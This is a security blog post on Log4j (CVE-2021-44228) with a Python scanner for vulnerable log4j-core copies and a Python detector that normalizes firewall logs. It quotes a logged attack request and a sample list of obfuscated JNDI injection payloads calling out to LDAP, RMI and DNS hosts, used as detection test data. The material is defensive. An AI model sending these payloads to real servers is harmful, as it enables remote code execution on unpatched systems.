The importance of network visibility
Log4j
Are you affected?
Most organizations first want to know whether they are affected at all. That question is easy to answer if you have a software bill of materials (SBOM) ready. If you do not, prepare for some manual investigation, and put building an SBOM on the short-term to-do list. Either way, once you know whether you are impacted, you will patch, or implement a workaround where patching is not yet possible.
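Without an SBOM, the manual investigation boils down to locating every copy of log4j-core on the hosts you run, including copies buried inside WAR and EAR files where a plain file listing does not see them. The following Python script is an added example, not code from the original post: it walks a directory tree, opens every jar/war/ear, reads the version from the pom.properties that log4j-core ships under META-INF/maven/org.apache.logging.log4j/log4j-core/, recurses into nested archives, and flags versions in the range affected by CVE-2021-44228 (2.0-beta9 through 2.14.1, excluding the back-ported fixes 2.12.2 and 2.3.1). The directory it scans when run without arguments is a constructed fixture in a temporary directory; the file names and versions in it are invented for the demonstration.

```python
import io
import os
import tempfile
import zipfile

# log4j-core carries its Maven coordinates inside the jar; the version is read from this file.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
MAX_NESTING = 4  # EAR -> WAR -> jar is the realistic depth; also bounds zip-bomb recursion


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Pre-release tags are dropped."""
    parts = [int(p) for p in text.split("-")[0].split(".") if p.isdigit()]
    return tuple((parts + [0, 0, 0])[:3])


def affected_by_cve_2021_44228(version):
    """CVE-2021-44228 affects log4j-core 2.0-beta9 through 2.14.1. The fix shipped in 2.15.0
    and was back-ported as 2.12.2 (Java 7) and 2.3.1 (Java 6). Because the pre-release tag is
    dropped, 2.0-beta1..beta8 are over-reported (check those by hand); log4j 1.x is out of scope."""
    v = parse_version(version)
    if v[0] != 2 or v >= (2, 15, 0):
        return False
    if v[:2] == (2, 12) and v[2] >= 2:
        return False
    if v[:2] == (2, 3) and v[2] >= 1:
        return False
    return True


def scan_archive(data, origin, depth=0):
    """Yield (origin, version) for every log4j-core inside the archive bytes, descending into
    nested archives. 'outer!/inner' names the nesting the way a JDK jar: URL does."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = zf.namelist()
        if POM_PROPERTIES in names:
            for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    yield origin, line.split("=", 1)[1].strip()
        if depth >= MAX_NESTING:
            return
        for name in names:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                yield from scan_archive(zf.read(name), f"{origin}!/{name}", depth + 1)


def find_log4j(root):
    """Walk a directory tree and return one record per log4j-core copy found."""
    records = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in sorted(files):
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    for origin, version in scan_archive(fh.read(), path):
                        records.append({"path": origin, "version": version,
                                        "affected": affected_by_cve_2021_44228(version)})
    return records


def _zip(entries):
    """Build an in-memory zip from {name: content} (constructed test data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def _write(path, data):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)


def make_fixture(root):
    """Constructed tree: a loose log4j-core 2.14.1 jar, a WAR nesting log4j-core 2.17.1,
    and an unrelated jar that must not be reported. Names and versions are invented."""
    def log4j_jar(v):
        return _zip({POM_PROPERTIES: f"version={v}\nartifactId=log4j-core\n"})
    _write(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), log4j_jar("2.14.1"))
    _write(os.path.join(root, "lib", "commons-io-2.11.0.jar"),
           _zip({"META-INF/MANIFEST.MF": "Manifest-Version: 1.0\n"}))
    _write(os.path.join(root, "app.war"),
           _zip({"WEB-INF/lib/log4j-core-2.17.1.jar": log4j_jar("2.17.1"),
                 "WEB-INF/web.xml": "<web-app/>"}))
    return root


def demo():
    """Build the constructed fixture in a temp dir and scan it."""
    return find_log4j(make_fixture(tempfile.mkdtemp(prefix="log4j-scan-")))


if __name__ == "__main__":
    for rec in demo():
        flag = "VULNERABLE" if rec["affected"] else "ok"
        print(f"{flag:10} {rec['version']:8} {rec['path']}")
```

Point find_log4j() at /opt, /usr/share, application server directories, or wherever your Java workloads live. Two caveats: the yes/no flag only covers the original JNDI lookup issue, while the follow-up CVEs were fixed in 2.16.0, 2.17.0 and 2.17.1, so keep the version column and plan updates from it; and a jar whose JndiLookup.class was removed as a workaround is still reported by its version, which during an incident is the conservative outcome you want.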
Network intrusion detection
A practical example
This might sound a bit abstract, so here is an example from our own environment:
1. The attacker sent a malicious request to our perimeter firewall. Note that the braces around the JNDI lookup arrive percent-encoded (%7B and %7D), so a detection rule that only looks for the literal string ${jndi: in the raw request would miss it:
GET /$%7Bjndi:ldap://x.x.x.x:x/Exploit%7D HTTP/1.1
2. Our perimeter firewall logged this request and forwarded the log to a central logging server.
3. The request then reached the webserver behind the firewall, whose own log shows the decoded payload: the server treated it as a path under its document root and tried to open it as a file. Also note that the double slash after ldap: has been collapsed to a single slash by the time it was logged, so do not rely on an exact match against the original request string:
open() "/usr/local/www/${jndi:ldap:/x.x.x.x:x/Exploit}"
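Detection at the perimeter comes down to the decoding step. As an added example that is not part of the original post, here is a Python routine that normalizes a firewall log line the way the request above had to be normalized before it matched (percent-decoding, applied repeatedly because attackers double-encode), and also folds away two obfuscations widely used against naive ${jndi: signatures, the ${lower:x}/${upper:x} case lookups and the ${prefix:key:-default} fallback syntax, before matching. The log lines it runs over are constructed samples using documentation IP ranges, not traffic from the incident described above.

```python
import re
from urllib.parse import unquote

# Constructed sample of perimeter-firewall log lines (not real traffic). The first mirrors the
# percent-encoded request shown above; the others are common obfuscations plus benign noise.
SAMPLE_LOG = [
    "GET /$%7Bjndi:ldap://192.0.2.10:1389/Exploit%7D HTTP/1.1",
    "GET /index.html HTTP/1.1",
    "User-Agent: ${${lower:j}${lower:N}di:ldap://192.0.2.10:1389/a}",
    "X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:rmi://192.0.2.11:1099/b}",
    "GET /%2524%257Bjndi:dns://192.0.2.12/c%257D HTTP/1.1",
    "GET /report?when=${date:yyyy-MM-dd} HTTP/1.1",
]

JNDI_LOOKUP = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)
# ${lower:X} / ${upper:X}: log4j's case lookups, used to assemble "jndi" from pieces.
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${prefix:key:-default}: log4j falls back to the default when the lookup fails, so
# ${::-j} resolves to the literal "j".
DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
MAX_ROUNDS = 5  # enough for double/triple encoding without looping forever


def _case_fold(m):
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()


def normalize(text, rounds=MAX_ROUNDS):
    """Peel off the layers an attacker can wrap around ${jndi:...}: percent-encoding
    (repeated), case lookups and default-value lookups. Stops when a pass changes nothing,
    so the innermost ${...} is exposed for matching."""
    for _ in range(rounds):
        new = unquote(text)
        new = CASE_LOOKUP.sub(_case_fold, new)
        new = DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def is_jndi_lookup(line):
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan(lines):
    """Return (line number, normalized line) for every line carrying a JNDI lookup."""
    return [(i, normalize(line)) for i, line in enumerate(lines, 1) if is_jndi_lookup(line)]


if __name__ == "__main__":
    for lineno, decoded in scan(SAMPLE_LOG):
        print(f"line {lineno}: {decoded}")
```

Run over the central log collection, this flags lines 1, 3, 4 and 5 of the sample and leaves the benign ${date:...} lookup alone. Treat it as a hunting and alerting aid, not proof of compromise: a matching request only tells you the payload arrived, and the next questions are whether a vulnerable log4j-core logged that field and whether the host made the outbound LDAP, RMI or DNS connection the lookup points at.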
Conclusion
- Threat actors do not need much time to exploit newly disclosed vulnerabilities. Worse, they tend to abuse the confusion surrounding a disclosure for their own gain.
- Visibility into and knowledge of your own network are crucial to detect whether you have been attacked, and they speed up incident response when an incident does occur.
Do you need help increasing network visibility, or assistance assessing vulnerabilities in your systems? Feel free to reach out to us; we will gladly help.